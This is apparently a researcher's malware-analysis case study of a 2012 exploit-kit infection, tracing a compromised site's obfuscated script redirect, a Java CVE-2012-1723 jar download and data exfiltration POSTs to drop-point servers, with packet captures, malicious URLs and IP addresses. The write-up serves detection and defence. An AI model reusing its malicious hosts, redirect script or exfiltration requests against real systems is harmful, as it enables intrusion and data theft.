Case Study: Exploiting Weakness To Quietly Exfiltrate Data

As per Emergingthreats, this is the Glazunov exploit kit.

This particular case is an excellent example to demonstrate that malware authors do their best to avoid detection and do not play by the internet rules. The utilization of defense in depth is a critical component to any information security program and would assist in limiting the damage from an attack of this nature.

This example shows:

• A compromised site/malicious site which is, for the better part, unrecognized.
• A redirect to HTTP TCP port 8080 direct to IP
• Content delivery which appear innocuous in URL logs.
• Java exploits which are not detected by virtually any AV
• Malware which is not detected
• Exfiltration of data on high ports showing as only TCP connections
• Utilizing other people's IP addresses as drop points

This was achieved because of the following gaps in security:

• Endpoint did not have updated Java version and was vulnerable
• Web filtering did not block direct to IP requests
• Layer 7 filtering was not performed at the perimeter (IPS) for the exploit code.
• AV did not detect the malware
• Outbound ports were not restricted. The endpoint could communicate outbound.

The entry point is a 301 redirect, however the content length is a28 and there is what AVG recognizes as a Blackhole redirect in the 301 response. 
hxxp://www.helloooooo.com/2009/01/splinter-impostor-claims-worlds-longest-hair/
This is a dangerous website and should not be visited in a browser.






The next step is for me to get the redirect URL.


GET /2009/01/splinter-impostor-claims-worlds-longest-hair/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.helloooooo.com
Connection: Keep-Alive


And gives me a gift... to quote my friend Tarun.
HTTP/1.1 200 OK
Date: Tue, 27 Nov 2012 00:10:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Pingback: http://www.helloooooo.com/xmlrpc.php
Link: <http://www.helloooooo.com/?p=1892>; rel=shortlink
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
5244
<script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];




The redirect is to a rigo6680.zapto.org/?go=2, this is consistent with TDS redirects.


http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b


Additional redirects appear everywhere on the page, see the CSS redirect below.

Redirect from a CSS file.
http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725

What happens next?

The following URL chain occurs. Included in here is a youtube video, 74.125.x.y ip address.


609  31.956187  10.1.2.3 -> 74.125.236.9 HTTP 408 GET /v/hYaYCPmFWKw&hl=en&fs=1 HTTP/1.1
613  32.126215  10.1.2.3 -> 65.163.12.222 HTTP 454 GET /wp-content/themes/twentyten/images/wordpress.png HTTP/1.1
616  32.196442 65.163.12.222 -> 10.1.2.3  HTTP 1152 HTTP/1.1 200 OK  (PNG)
625  32.545505 74.125.236.9 -> 10.1.2.3  HTTP 674 HTTP/1.1 200 OK  (application/x-shockwave-flash)
637  33.374071  10.1.2.3 -> 64.34.183.111 HTTP 335 GET /2354796716/12230 HTTP/1.1
673  33.543459  10.1.2.3 -> 74.125.236.1 HTTP 382 GET /yts/swfbin/watch_as3-vfl1ubMZd.swf HTTP/1.1
688  33.587050 64.34.183.111 -> 10.1.2.3  HTTP 104 HTTP/1.1 200 OK  (application/x-java-archive)
695  33.626438  10.1.2.3 -> 64.34.183.111 HTTP 292 GET /2354796716/12230 HTTP/1.1
744  33.867125 64.34.183.111 -> 10.1.2.3  HTTP 104 HTTP/1.1 200 OK  (application/x-java-archive)
770  34.193535  10.1.2.3 -> 64.34.183.111 HTTP 245 GET /15692 HTTP/1.1
931  34.501338 64.34.183.111 -> 10.1.2.3  HTTP/DL 958 unknown (0x4d)

Here's the Java.

And we run the Java, which contains CVE 2012-1723 and the binary materializes and is executed immediately.

Posting Data to Drop Points

What we get are connections on TCP port 35516 posting  data to compromised Windows servers online. What is interesting about this is that it is not recognized as HTTP. It is only protocol TCP and on outbound port 35516. This would fly under the radar of many detection mechanisms.

This infection is a wonderful case study in an infection chain using difficult to detect methods and exploiting weaknesses in infrastructure, perimeter security and vulnerable workstation software.

Four IP addresses were drop points:
131.96.243.22
74.59.207.114
68.197.117.117
87.203.78.137

The infection point is 64.34.183.111:8080

Here is what the Posting looks like.

VT for Jar file. CVE 2012-1723 - 2/46

https://www.virustotal.com/file/4f88dd9dbeaba9a59ab1c077b4e98be72c66e59f79ad8cc95c0952530ca698f3/analysis/1354328781/

ed-309-aaenak.gsu.edu

Raw POST information

POST /nymain/nm1932719/index.php HTTP/1.1
Host: 131.96.243.22
Content-Length: 54
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=bphgt.ntz&data=œT¬»ñOõ[!5a9±r8ÆàSÞ¼ƒAôˆPöêÙ

HTTP/1.1 200 OK
Content-Length: 4
Connection: close

[

------------------------------------------------------------------

POST /nymain/nm1932719/index.php HTTP/1.1
Host: 74.59.207.114
Content-Length: 58
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=skjlrke.kcf&data=¾¤±ß]NçWB\—%~}SóC坣tZ‡£¬4Ø–‘

videotron.ca (1) 



Host: modemcable114.207-59-74.mc.videotron.ca

@fknsec

All investigations were performed in my personal lab. This article's content and any opinions expressed are not the opinions of any past, present or future employer. Lawyers are our friends.